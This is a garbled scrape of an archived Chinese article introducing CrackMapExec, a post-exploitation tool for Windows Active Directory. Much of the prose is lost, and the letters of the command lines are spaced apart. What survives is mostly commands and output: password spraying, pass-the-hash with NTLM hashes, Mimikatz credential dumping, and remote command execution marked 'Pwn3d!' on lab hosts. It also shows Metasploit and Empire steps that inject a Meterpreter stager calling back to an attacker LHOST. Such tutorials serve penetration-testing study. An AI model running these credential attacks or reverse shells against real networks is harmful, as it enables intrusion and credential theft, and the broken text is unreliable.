搜索

[13253] 2018-10-02_CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2018-10-02_CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具 C r a c k M a p E x e c W i n d o w s ( A D ) s e c i s t   F r e e B u f   2 0 1 8 - 1 0 - 0 2 C r a c k M a p E x e c C M E ( A D ) @ b y t 3 b l 3 3 d 3 r A D / / I D S / I P S 使 C M E 使 P o w e r S p l o i t I m p a c k e t B l e e d i n g - E d g e g i t   c l o n e r e c u r s i v e g i t C M E K a l i B l e e g i n g - E d g e 使 p i p e n v C M E # ~   a p t - g e t   i n s t a l l   c r a c k m a p e x e c
D e b i a n / U b u n t u 使 p i p e n v C M E B l e e g i n g - E d g e A r c h   L i n u x 使 p i p e n v C M E B l e e g i n g - E d g e M a c   O S X 使 p i p e n v C M E B l e e g i n g - E d g e L o g s C M E ~ / . c m e / l o g s 使 使 # ~   a p t - g e t   i n s t a l l   - y   l i b s s l - d e v   l i b f f i - d e v   p y t h o n - d e v   b u i l d - e s s e n t i a l # ~   p i p   i n s t a l l   - - u s e r   p i p e n v # ~   g i t   c l o n e   - - r e c u r s i v e   h t t p s : / / g i t h u b . c o m / b y t 3 b l 3 3 d 3 r / C r a c k M a p E x e c # ~   c d   C r a c k M a p E x e c   & &   p i p e n v   i n s t a l l # ~   p i p e n v   s h e l l # ~   p y t h o n   s e t u p . p y   i n s t a l l # ~   a p t - g e t   i n s t a l l   - y   l i b s s l - d e v   l i b f f i - d e v   p y t h o n - d e v   b u i l d - e s s e n t i a l # ~   p i p   i n s t a l l   c r a c k m a p e x e c # ~   a p t - g e t   i n s t a l l   - y   l i b s s l - d e v   l i b f f i - d e v   p y t h o n - d e v   b u i l d - e s s e n t i a l # ~   p i p   i n s t a l l   - - u s e r   p i p e n v # ~   g i t   c l o n e   - - r e c u r s i v e   h t t p s : / / g i t h u b . c o m / b y t 3 b l 3 3 d 3 r / C r a c k M a p E x e c # ~   c d   C r a c k M a p E x e c   & &   p i p e n v   i n s t a l l # ~   p i p e n v   s h e l l # ~   p y t h o n   s e t u p . p y   i n s t a l l p i p   i n s t a l l   c r a c k m a p e x e c # ~   p i p   i n s t a l l   - - u s e r   p i p e n v # ~   g i t   c l o n e   - - r e c u r s i v e   h t t p s : / / g i t h u b . c o m / b y t 3 b l 3 3 d 3 r / C r a c k M a p E x e c # ~   c d   C r a c k M a p E x e c   & &   p i p e n v   i n s t a l l # ~   p i p e n v   s h e l l # ~   p y t h o n   s e t u p . p y   i n s t a l l p i p   i n s t a l l   - - u s e r   c r a c k m a p e x e c # ~   p i p   i n s t a l l   - - u s e r   p i p e n v # ~   g i t   c l o n e   - - r e c u r s i v e   h t t p s : / / g i t h u b . c o m / b y t 3 b l 3 3 d 3 r / C r a c k M a p E x e c # ~   c d   C r a c k M a p E x e c   & &   p i p e n v   i n s t a l l # ~   p i p e n v   s h e l l # ~   p y t h o n   s e t u p . p y   i n s t a l l
v 4 C M E / / s i m p l i f y / o r g i n i z e / m o d u l a r i z e C M E A c t i v e   D i r e c t o r y 使 c m e   < >   < > c m e   h e l p c m e     h e l p   S M B # ~   c m e   - - h e l p u s a g e :   c m e   [ - h ]   [ - v ]   [ - t   T H R E A D S ]   [ - - t i m e o u t   T I M E O U T ]   [ - - j i t t e r   I N T E R V A L ]                       [ - - d a r r e l l ]   [ - - v e r b o s e ]                       { h t t p , s m b , m s s q l }   . . .             _ _ _ _ _ _   . _ _ _ _ _ _                       _ _ _                 _ _ _ _ _ _     _ _     _ _ _   . _ _ _     _ _ _ .             _ _ _             . _ _ _ _ _ _         _ _ _ _ _ _ _   _ _ _       _ _ _     _ _ _ _ _ _ _       _ _ _ _ _ _           /             | |       _                       /                   /             | |     | /     /   |       /       |           /                 |       _         |       _ _ _ _ |       /     /   |       _ _ _ _ |   /             |         |     , - - - - ' |     | _ )     |               /     ^             |     , - - - - ' |     '     /     |         /     |         /     ^             |     | _ )     |   |     | _ _             V     /     |     | _ _       |     , - - - - '         |     |           |             /               /     / _           |     |           |         <       |     | / |     |       /     / _           |       _ _ _ /     |       _ _ |         >       <       |       _ _ |     |     |         |     ` - - - - . |     |     - - - - .   /     _ _ _ _ _         |     ` - - - - . |     .         |     |     |     |     /     _ _ _ _ _         |     |             |     | _ _ _ _     /     .         |     | _ _ _ _   |     ` - - - - .           _ _ _ _ _ _ | |   _ |   ` . _ _ _ _ _ | / _ _ /           _ _     _ _ _ _ _ _ | | _ _ | _ _   | _ _ |     | _ _ |   / _ _ /           _ _   |   _ |             | _ _ _ _ _ _ _ | / _ _ /   _ _   | _ _ _ _ _ _ _ |   _ _ _ _ _ _ |                                                                                   A   s w i s s   a r m y   k n i f e   f o r   p e n t e s t i n g   n e t w o r k s                                                                         F o r g e d   b y   @ b y t 3 b l 3 3 d 3 r   u s i n g   t h e   p o w a h   o f   d a n k   m e m e s                                                                                                             V e r s i o n :   4 . 0 . 0 d e v                                                                                                           C o d e n a m e :   ' S e r c u r t y ' o p t i o n a l   a r g u m e n t s :     - h ,   - - h e l p                   s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t     - v ,   - - v e r s i o n             s h o w   p r o g r a m ' s   v e r s i o n   n u m b e r   a n d   e x i t     - t   T H R E A D S                   s e t   h o w   m a n y   c o n c u r r e n t   t h r e a d s   t o   u s e   ( d e f a u l t :   1 0 0 )     - - t i m e o u t   T I M E O U T     m a x   t i m e o u t   i n   s e c o n d s   o f   e a c h   t h r e a d   ( d e f a u l t :   N o n e )     - - j i t t e r   I N T E R V A L     s e t s   a   r a n d o m   d e l a y   b e t w e e n   e a c h   c o n n e c t i o n   ( d e f a u l t :   N o n e )     - - d a r r e l l                     g i v e   D a r r e l l   a   h a n d     - - v e r b o s e                     e n a b l e   v e r b o s e   o u t p u t p r o t o c o l s :     a v a i l a b l e   p r o t o c o l s     { h t t p , s m b , m s s q l }         h t t p                           o w n   s t u f f   u s i n g   H T T P ( S )         s m b                             o w n   s t u f f   u s i n g   S M B   a n d / o r   A c t i v e   D i r e c t o r y         m s s q l                         o w n   s t u f f   u s i n g   M S S Q L   a n d / o r   A c t i v e   D i r e c t o r y S e r r r r r r c u u u r r r t y ?
C I D R I P I P 使 使 使 1 使 s h e l l # ~   c m e   s m b   - - h e l p u s a g e :   c m e   s m b   [ - h ]   [ - i d   C R E D _ I D   [ C R E D _ I D   . . . ] ]   [ - u   U S E R N A M E   [ U S E R N A M E   . . . ] ]                               [ - p   P A S S W O R D   [ P A S S W O R D   . . . ] ]                               [ - - g f a i l - l i m i t   L I M I T   |   - - u f a i l - l i m i t   L I M I T   |   - - f a i l - l i m i t   L I M I T ]                               [ - M   M O D U L E ]   [ - o   M O D U L E _ O P T I O N   [ M O D U L E _ O P T I O N   . . . ] ]   [ - L ]                               [ - - o p t i o n s ]   [ - - s e r v e r   { h t t p , h t t p s } ]   [ - - s e r v e r - h o s t   H O S T ]                               [ - - s e r v e r - p o r t   P O R T ]   [ - H   H A S H   [ H A S H   . . . ] ]                               [ - d   D O M A I N   |   - - l o c a l - a u t h ]   [ - - s m b - p o r t   { 1 3 9 , 4 4 5 } ]                               [ - - s h a r e   S H A R E ]   [ - - g e n - r e l a y - l i s t   O U T P U T _ F I L E ]                               [ - - s a m   |   - - l s a   |   - - n t d s   { v s s , d r s u a p i } ]   [ - - s h a r e s ]   [ - - s e s s i o n s ]                               [ - - d i s k s ]   [ - - l o g g e d o n - u s e r s ]   [ - - u s e r s   [ U S E R ] ]                               [ - - g r o u p s   [ G R O U P ] ]   [ - - l o c a l - g r o u p s   [ G R O U P ] ]   [ - - p a s s - p o l ]                               [ - - r i d - b r u t e   [ M A X _ R I D ] ]   [ - - w m i   Q U E R Y ]                               [ - - w m i - n a m e s p a c e   N A M E S P A C E ]   [ - - s p i d e r   S H A R E ]                               [ - - s p i d e r - f o l d e r   F O L D E R ]   [ - - c o n t e n t ]   [ - - e x c l u d e - d i r s   D I R _ L I S T ]                               [ - - p a t t e r n   P A T T E R N   [ P A T T E R N   . . . ]   |   - - r e g e x   R E G E X   [ R E G E X   . . . ] ]                               [ - - d e p t h   D E P T H ]   [ - - o n l y - f i l e s ]                               [ - - e x e c - m e t h o d   { m m c e x e c , s m b e x e c , w m i e x e c , a t e x e c } ]   [ - - f o r c e - p s 3 2 ]                               [ - - n o - o u t p u t ]   [ - x   C O M M A N D   |   - X   P S _ C O M M A N D ]                               [ t a r g e t   [ t a r g e t   . . . ] ] p o s i t i o n a l   a r g u m e n t s :     t a r g e t                                 t h e   t a r g e t   I P ( s ) ,   r a n g e ( s ) ,   C I D R ( s ) ,   h o s t n a m e ( s ) ,                                                 F Q D N ( s )   o r   f i l e ( s )   c o n t a i n g   a   l i s t   o f   t a r g e t s o p t i o n a l   a r g u m e n t s :     - h ,   - - h e l p                         s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t     - i d   C R E D _ I D   [ C R E D _ I D   . . . ]                                                 d a t a b a s e   c r e d e n t i a l   I D ( s )   t o   u s e   f o r   a u t h e n t i c a t i o n     - u   U S E R N A M E   [ U S E R N A M E   . . . ]                                                 u s e r n a m e ( s )   o r   f i l e ( s )   c o n t a i n i n g   u s e r n a m e s     - p   P A S S W O R D   [ P A S S W O R D   . . . ]                                                 p a s s w o r d ( s )   o r   f i l e ( s )   c o n t a i n i n g   p a s s w o r d s     - - g f a i l - l i m i t   L I M I T       m a x   n u m b e r   o f   g l o b a l   f a i l e d   l o g i n   a t t e m p t s     - - u f a i l - l i m i t   L I M I T       m a x   n u m b e r   o f   f a i l e d   l o g i n   a t t e m p t s   p e r   u s e r n a m e     - - f a i l - l i m i t   L I M I T         m a x   n u m b e r   o f   f a i l e d   l o g i n   a t t e m p t s   p e r   h o s t     - M   M O D U L E ,   - - m o d u l e   M O D U L E                                                 p a y l o a d   m o d u l e   t o   u s e     - o   M O D U L E _ O P T I O N   [ M O D U L E _ O P T I O N   . . . ]                                                 p a y l o a d   m o d u l e   o p t i o n s     - L ,   - - l i s t - m o d u l e s         l i s t   a v a i l a b l e   m o d u l e s     - - o p t i o n s                           d i s p l a y   m o d u l e   o p t i o n s     - - s e r v e r   { h t t p , h t t p s }                                                 u s e   t h e   s e l e c t e d   s e r v e r   ( d e f a u l t :   h t t p s )     - - s e r v e r - h o s t   H O S T         I P   t o   b i n d   t h e   s e r v e r   t o   ( d e f a u l t :   0 . 0 . 0 . 0 )     - - s e r v e r - p o r t   P O R T         s t a r t   t h e   s e r v e r   o n   t h e   s p e c i f i e d   p o r t     - H   H A S H   [ H A S H   . . . ] ,   - - h a s h   H A S H   [ H A S H   . . . ] - -   S N I P   - - c r a c k m a p e x e c   < p r o t o c o l >   m s . e v i l c o r p . o r g c r a c k m a p e x e c   < p r o t o c o l >   1 9 2 . 1 6 8 . 1 . 0   1 9 2 . 1 6 8 . 0 . 2 c r a c k m a p e x e c   < p r o t o c o l >   1 9 2 . 1 6 8 . 1 . 0 / 2 4 c r a c k m a p e x e c   < p r o t o c o l >   1 9 2 . 1 6 8 . 1 . 0 - 2 8   1 0 . 0 . 0 . 1 - 6 7 c r a c k m a p e x e c   < p r o t o c o l >   ~ / t a r g e t s . t x t c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - u   u s e r n a m e   - p   p a s s w o r d
2 P y t h o n b u g 线   -   使 l o n g = 使 使 使 - i d I D I D C M E & P a s s w o r d   S p r a y i n g P a s s w o r d   S p r a y i n g 使 / w i k i C M E 使 使 使 v 3 . 1 使 使 C M E v 4 . 0   c m e     - L   S M B 使 使   c m e       - M   S M B   M i m i k a t z c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - u   u s e r n a m e   - p   ' A d m i n ! 1 2 3 @ ' c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - u = ' - u s e r n a m e '   - p = ' - A d m i n ! 1 2 3 @ ' c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - i d   < c r e d   I D ( s ) > c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - u   u s e r n a m e 1   - p   p a s s w o r d 1   p a s s w o r d 2 c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - u   u s e r n a m e 1   u s e r n a m e 2   - p   p a s s w o r d 1 c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - u   ~ / f i l e _ c o n t a i n i n g _ u s e r n a m e s   - p   ~ / f i l e _ c o n t a i n i n g _ p a s s w o r d s c r a c k m a p e x e c   < p r o t o c o l >   < t a r g e t ( s ) >   - u   ~ / f i l e _ c o n t a i n i n g _ u s e r n a m e s   - H   ~ / f i l e _ c o n t a i n i n g _ n t l m _ h a s h e s # ~   c m e   s m b   - L [ * ]   m e t _ i n j e c t                                 D o w n l o a d s   t h e   M e t e r p r e t e r   s t a g e r   a n d   i n j e c t s   i t   i n t o   m e m o r y [ * ]   g e t _ k e y s t r o k e s                         L o g s   k e y s   p r e s s e d ,   t i m e   a n d   t h e   a c t i v e   w i n d o w [ * ]   e m p i r e _ e x e c                               U s e s   E m p i r e ' s   R E S T f u l   A P I   t o   g e n e r a t e   a   l a u n c h e r   f o r   t h e   s p e c i f i e d   l i s t e n e r   a n d   e x e c u t e s   i t - -   S N I P   - - # ~   c r a c k m a p e x e c   s m b   < t a r g e t ( s ) >   - u   A d m i n i s t r a t o r   - p   ' P @ s s w 0 r d '   - M   m i m i k a t z
  c m e     - M   < >   o p t i o n s   使 使 使 - o K E Y = v a l u e   ( m s f v e n o m   s t y l e ) C M E 使 / C M E   v 4 v 4 w o r k s p a c e s M e t a s p l o i t W i k i w o r k s p a c e s ~ / . c m e / w o r k s p a c e s C M E c m e d b   c m e d b s h e l l W o r k s p a c e s w o r k s p a c e d e f a u l t w o r k s p a c e C M E w o r k s p a c e 访 访 访 p r o t o   t e s t 使 S M B # ~   c m e   s m b   - M   m i m i k a t z   - - o p t i o n s # ~   c m e   < p r o t o c o l >   < t a r g e t ( s ) >   - u   A d m i n i s t r a t o r   - p   ' P @ s s w 0 r d '   - M   m i m i k a t z   - o   C O M M A N D = ' p r i v i l e g e : : d e b u g ' # ~   c m e d b c m e d b   ( d e f a u l t )   > c m e d b   ( d e f a u l t )   >   w o r k s p a c e   c r e a t e   t e s t [ * ]   C r e a t i n g   w o r k s p a c e   ' t e s t ' [ * ]   I n i t i a l i z i n g   H T T P   p r o t o c o l   d a t a b a s e [ * ]   I n i t i a l i z i n g   S M B   p r o t o c o l   d a t a b a s e [ * ]   I n i t i a l i z i n g   M S S Q L   p r o t o c o l   d a t a b a s e c m e d b   ( t e s t )   > c m e d b   ( t e s t )   >   w o r k s p a c e   d e f a u l t c m e d b   ( d e f a u l t )   > c m e d b   ( t e s t )   >   p r o t o   s m b c m e d b   ( t e s t ) ( s m b )   >
h e l p W i k i S M B P a s s i n g - t h e - H a s h C M E 使 - H P a s s i n g - T h e - H a s h S M B N U L L   S e s s i o n s 使 / 使 使 S M B ~ E m p i r e M e t a s p l o i t C M E E x p l o i t / P o s t - E x p l o i t a t i o n 便 使 E m p i r e M e t a s p l o i t E m p i r e c m e d b 使 R E S T f u l   A P I E m p i r e 使 E m p i r e c m e d b C M E h t t p s : / / g i t h u b . c o m / b y t 3 b l 3 3 d 3 r / C r a c k M a p E x e c / w i k i / U s i n g - t h e - D a t a b a s e E m p i r e R E S T f u l   A P I C M E E m p i r e R E S T f u l   A P I ~ / . c m e / c m e . c o n f c m e d b   ( t e s t ) ( s m b )   >   b a c k c m e d b   ( t e s t )   >   p r o t o   h t t p c m e d b   ( t e s t ) ( h t t p )   > c r a c k m a p e x e c   s m b   < t a r g e t ( s ) >   - u   u s e r n a m e   - H   L M H A S H : N T H A S H c r a c k m a p e x e c   s m b   < t a r g e t ( s ) >   - u   u s e r n a m e   - H   N T H A S H c r a c k m a p e x e c   s m b   < t a r g e t ( s ) >   - u   ' '   - p   ' ' # ~   p y t h o n   e m p i r e   - - r e s t   - - u s e r   e m p i r e a d m i n   - - p a s s   P a s s w o r d 1 2 3 ! [ * ]   L o a d i n g   m o d u l e s   f r o m :   / h o m e / b y t 3 b l 3 3 d 3 r / T o o l s / E m p i r e / l i b / m o d u l e s /   *   S t a r t i n g   E m p i r e   R E S T f u l   A P I   o n   p o r t :   1 3 3 7   *   R E S T f u l   A P I   t o k e n :   l 5 l 0 5 1 e q i q e 7 0 c 7 5 d i s 6 8 q j h e g 7 b 1 9 d i 7 n 8 a u z m l   *   R u n n i n g   o n   h t t p s : / / 0 . 0 . 0 . 0 : 1 3 3 7 /   ( P r e s s   C T R L + C   t o   q u i t ) [ E m p i r e ] a p i _ h o s t = 1 2 7 . 0 . 0 . 1 a p i _ p o r t = 1 3 3 7 u s e r n a m e = e m p i r e a d m i n p a s s w o r d = P a s s w o r d 1 2 3 ! [ M e t a s p l o i t ] r p c _ h o s t = 1 2 7 . 0 . 0 . 1 r p c _ p o r t = 5 5 5 5 2 p a s s w o r d = a b c 1 2 3
E m p i r e c m e d b i m p o r t   e m p i r e M e t a s p l o i t ~ G e t t i n g   S h e l l s   1 0 1 E m p i r e   A g e n t 使 e m p i r e _ e x e c E m p i r e   A g e n t s t a g e r E m p i r e R E S T f u l   A P I l i s t e n e r l a u n c h e r E m p i r e     l i s t e n e r E m p i r e R E S T f u l   A P I C M E E m p i r e R E S T f u l   A P I ~ / . c m e / c m e . c o n f # ~   c m e d b c m e d b   >   c r e d s C r e d e n t i a l s :     C r e d I D     A d m i n   O n           C r e d T y p e         D o m a i n                       U s e r N a m e                           P a s s w o r d     - - - - - -     - - - - - - - -           - - - - - - - -         - - - - - -                       - - - - - - - -                           - - - - - - - - c m e d b   >   i m p o r t   e m p i r e [ + ]   E m p i r e   c r e d e n t i a l   i m p o r t   s u c c e s s f u l c m e d b   >   c r e d s C r e d e n t i a l s :     C r e d I D     A d m i n   O n           C r e d T y p e         D o m a i n                       U s e r N a m e                           P a s s w o r d     - - - - - -     - - - - - - - -           - - - - - - - -         - - - - - -                       - - - - - - - -                           - - - - - - - -     1               0   H o s t ( s )         h a s h                 l a b . l o c a l                 y o m a m a                               e 1 9 c c f 7 5 e e 5 4 e 0 6 b 0 6 a 5 9 0 7 a f 1 3 c e f 4 2     2               0   H o s t ( s )         p l a i n t e x t       l a b . l o c a l                 y o m a m a                               P @ s s w 0 r d                   c m e d b   > ( E m p i r e :   l i s t e n e r s )   >   s e t   N a m e   t e s t ( E m p i r e :   l i s t e n e r s )   >   s e t   H o s t   1 9 2 . 1 6 8 . 1 0 . 3 ( E m p i r e :   l i s t e n e r s )   >   s e t   P o r t   9 0 9 0 ( E m p i r e :   l i s t e n e r s )   >   s e t   C e r t P a t h   d a t a / e m p i r e . p e m ( E m p i r e :   l i s t e n e r s )   >   r u n ( E m p i r e :   l i s t e n e r s )   >   l i s t [ * ]   A c t i v e   l i s t e n e r s :     I D         N a m e                             H o s t                                                                   T y p e             D e l a y / J i t t e r       K i l l D a t e         R e d i r e c t   T a r g e t     - -         - - - -                             - - - -                                                                   - - - - - - -       - - - - - - - - - - - -       - - - - - - - -         - - - - - - - - - - - - - - -     1           t e s t                             h t t p : / / 1 9 2 . 1 6 8 . 1 0 . 3 : 9 0 9 0                                   n a t i v e         5 / 0 . 0                                             ( E m p i r e :   l i s t e n e r s )   > # ~   p y t h o n   e m p i r e   - - r e s t   - - u s e r   e m p i r e a d m i n   - - p a s s   P a s s w o r d 1 2 3 ! [ * ]   L o a d i n g   m o d u l e s   f r o m :   / h o m e / b y t 3 b l 3 3 d 3 r / T o o l s / E m p i r e / l i b / m o d u l e s /   *   S t a r t i n g   E m p i r e   R E S T f u l   A P I   o n   p o r t :   1 3 3 7   *   R E S T f u l   A P I   t o k e n :   l 5 l 0 5 1 e q i q e 7 0 c 7 5 d i s 6 8 q j h e g 7 b 1 9 d i 7 n 8 a u z m l   *   R u n n i n g   o n   h t t p s : / / 0 . 0 . 0 . 0 : 1 3 3 7 /   ( P r e s s   C T R L + C   t o   q u i t ) [ E m p i r e ] a p i _ h o s t = 1 2 7 . 0 . 0 . 1 a p i _ p o r t = 1 3 3 7 u s e r n a m e = e m p i r e a d m i n p a s s w o r d = P a s s w o r d 1 2 3 ! [ M e t a s p l o i t ] r p c _ h o s t = 1 2 7 . 0 . 0 . 1 r p c _ p o r t = 5 5 5 5 2 p a s s w o r d = a b c 1 2 3
e m p i r e _ e x e c l i s t e n e r M e t e r p r e t e r 使 m e t i n j e c t 使 P o w e r S p l o i t I n v o k e - S h e l l c o d e . p s 1 m e t e r p r e t e r h a n d l e r m e t i n j e c t L H O S T L P O R T W i n d o w s C M E   ( P w n 3 d ! )   使 访 使 C M E 1 . w m i e x e c W M I 2 . a t e x e W i n d o w s 3 . s m b e x e c C M E 1 . w m i e x e c 2 . a t e x e c 3 . s m b e x e c 使 e x e c - m e t h o d 使 - x w h o a m i # ~   c r a c k m a p e x e c   1 9 2 . 1 6 8 . 1 0 . 0 / 2 4   - u   u s e r n a m e   - p   p a s s w o r d   - M   e m p i r e _ e x e c   - o   L I S T E N E R = t e s t m s f   >   u s e   e x p l o i t / m u l t i / h a n d l e r   m s f   e x p l o i t ( h a n d l e r )   >   s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s p a y l o a d   = >   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p s m s f   e x p l o i t ( h a n d l e r )   >   s e t   L H O S T   1 9 2 . 1 6 8 . 1 0 . 3 L H O S T   = >   1 9 2 . 1 6 8 . 1 0 . 3 m s f   e x p l o i t ( h a n d l e r )   >   s e t   e x i t o n s e s s i o n   f a l s e e x i t o n s e s s i o n   = >   f a l s e m s f   e x p l o i t ( h a n d l e r )   >   e x p l o i t   - j [ * ]   E x p l o i t   r u n n i n g   a s   b a c k g r o u n d   j o b . [ * ]   S t a r t e d   H T T P S   r e v e r s e   h a n d l e r   o n   h t t p s : / / 1 9 2 . 1 6 8 . 1 0 . 3 : 8 4 4 3 m s f   e x p l o i t ( h a n d l e r )   >   [ * ]   S t a r t i n g   t h e   p a y l o a d   h a n d l e r . . . # ~   c r a c k m a p e x e c   1 9 2 . 1 6 8 . 1 0 . 0 / 2 4   - u   u s e r n a m e   - p   p a s s w o r d   - M   m e t i n j e c t   - o   L H O S T = 1 9 2 . 1 6 8 . 1 0 . 3   L P O R T = 8 4 4 3
使 - X P o w e r S h e l l P o w e r s h e l l 3 2 S M B K a l i   L i n u x I P 1 9 2 . 1 6 8 . 1 . 0 / 2 4 C M E / S M B I P # ~   c r a c k m a p e x e c   1 9 2 . 1 6 8 . 1 0 . 1 1   - u   A d m i n i s t r a t o r   - p   ' P @ s s w 0 r d '   - x   w h o a m i 0 6 - 0 5 - 2 0 1 6   1 4 : 3 4 : 3 5   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   [ * ]   W i n d o w s   6 . 1   B u i l d   7 6 0 1   ( n a m e : W I N 7 B O X )   ( d o m a i n : L A B ) 0 6 - 0 5 - 2 0 1 6   1 4 : 3 4 : 3 5   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   [ + ]   L A B A d m i n i s t r a t o r : P @ s s w 0 r d   ( P w n 3 d ! ) 0 6 - 0 5 - 2 0 1 6   1 4 : 3 4 : 3 9   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   [ + ]   E x e c u t e d   c o m m a n d   0 6 - 0 5 - 2 0 1 6   1 4 : 3 4 : 3 9   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   l a b a d m i n i s t r a t o r 0 6 - 0 5 - 2 0 1 6   1 4 : 3 4 : 3 9   [ * ]   K T H X B Y E ! # ~   c r a c k m a p e x e c   1 9 2 . 1 6 8 . 1 0 . 1 1   - u   A d m i n i s t r a t o r   - p   ' P @ s s w 0 r d '   - X   ' $ P S V e r s i o n T a b l e ' 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 0 6   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   [ * ]   W i n d o w s   6 . 1   B u i l d   7 6 0 1   ( n a m e : W I N 7 B O X )   ( d o m a i n : L A B ) 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 0 6   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   [ + ]   L A B A d m i n i s t r a t o r : P @ s s w 0 r d   ( P w n 3 d ! ) 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   [ + ]   E x e c u t e d   c o m m a n d   0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   N a m e                                                       V a l u e 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   - - - -                                                       - - - - - 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   C L R V e r s i o n                                           2 . 0 . 5 0 7 2 7 . 5 4 2 0 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   B u i l d V e r s i o n                                       6 . 1 . 7 6 0 1 . 1 7 5 1 4 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   P S V e r s i o n                                             2 . 0 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   W S M a n S t a c k V e r s i o n                             2 . 0 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   P S C o m p a t i b l e V e r s i o n s                       { 1 . 0 ,   2 . 0 } 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   S e r i a l i z a t i o n V e r s i o n                       1 . 1 . 0 . 1 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   C M E                     1 9 2 . 1 6 8 . 1 0 . 1 1 : 4 4 5   W I N 7 B O X                   P S R e m o t i n g P r o t o c o l V e r s i o n             2 . 1 0 6 - 0 5 - 2 0 1 6   1 4 : 3 6 : 1 0   [ * ]   K T H X B Y E ! # ~   c r a c k m a p e x e c   1 9 2 . 1 6 8 . 1 0 . 1 1   - u   A d m i n i s t r a t o r   - p   ' P @ s s w 0 r d '   - X   ' [ S y s t e m . E n v i r o n m e n t ] : : I s 6 4 B i t P r o c e s s '   - - f o r c e - p s 3 2 S M B                   1 9 2 . 1 6 8 . 1 0 . 1 1         4 4 5         W I N 7 B O X                     [ * ]   W i n d o w s   7   U l t i m a t e   N   7 6 0 1   S e r v i c e   P a c k   1   x 6 4   ( n a m e : W I N 7 B O X )   ( d o m a i n : L A B )   ( s i g n i n g : F a l s e )   ( S M B v 1 : T r u e ) S M B                   1 9 2 . 1 6 8 . 1 0 . 1 1         4 4 5         W I N 7 B O X                     [ + ]   L A B A d m i n i s t r a t o r : P @ s s w 0 r d   ( P w n 3 d ! ) S M B                   1 9 2 . 1 6 8 . 1 0 . 1 1         4 4 5         W I N 7 B O X                     [ + ]   E x e c u t e d   c o m m a n d S M B                   1 9 2 . 1 6 8 . 1 0 . 1 1         4 4 5         W I N 7 B O X                     f a l s e - - n o - o u t p u t               D o e s   n o t   r e t r i e v e   c o m m a n d   r e s u l t s # ~   c m e   s m b   1 9 2 . 1 6 8 . 1 . 0 / 2 4 S M B                   1 9 2 . 1 6 8 . 1 . 1 0 1         4 4 5         D C 2 0 1 2 A                     [ * ]   W i n d o w s   S e r v e r   2 0 1 2   R 2   S t a n d a r d   9 6 0 0   x 6 4   ( n a m e : D C 2 0 1 2 A )   ( d o m a i n : O C E A N )   ( s i g n i n g : T r u e )   ( S M B v 1 : T r u e ) S M B                   1 9 2 . 1 6 8 . 1 . 1 0 2         4 4 5         D C 2 0 1 2 B                     [ * ]   W i n d o w s   S e r v e r   2 0 1 2   R 2   S t a n d a r d   9 6 0 0   x 6 4   ( n a m e : D C 2 0 1 2 B )   ( d o m a i n : E A R T H )   ( s i g n i n g : T r u e )   ( S M B v 1 : T r u e ) S M B                   1 9 2 . 1 6 8 . 1 . 1 1 0         4 4 5         D C 2 0 1 6 A                     [ * ]   W i n d o w s   S e r v e r   2 0 1 6   S t a n d a r d   E v a l u a t i o n   1 4 3 9 3   x 6 4   ( n a m e : D C 2 0 1 6 A )   ( d o m a i n : O C E A N )   ( s i g n i n g : T r u e )   ( S M B v 1 : T r u e ) S M B                   1 9 2 . 1 6 8 . 1 . 1 1 7         4 4 5         W I N 1 0 D E S K 1               [ * ]   W I N 1 0 D E S K 1   x 6 4   ( n a m e : W I N 1 0 D E S K 1 )   ( d o m a i n : O C E A N )   ( s i g n i n g : F a l s e )   ( S M B v 1 : T r u e ) # ~   c m e   s m b   1 9 2 . 1 6 8 . 1 . 0 / 2 4   - - 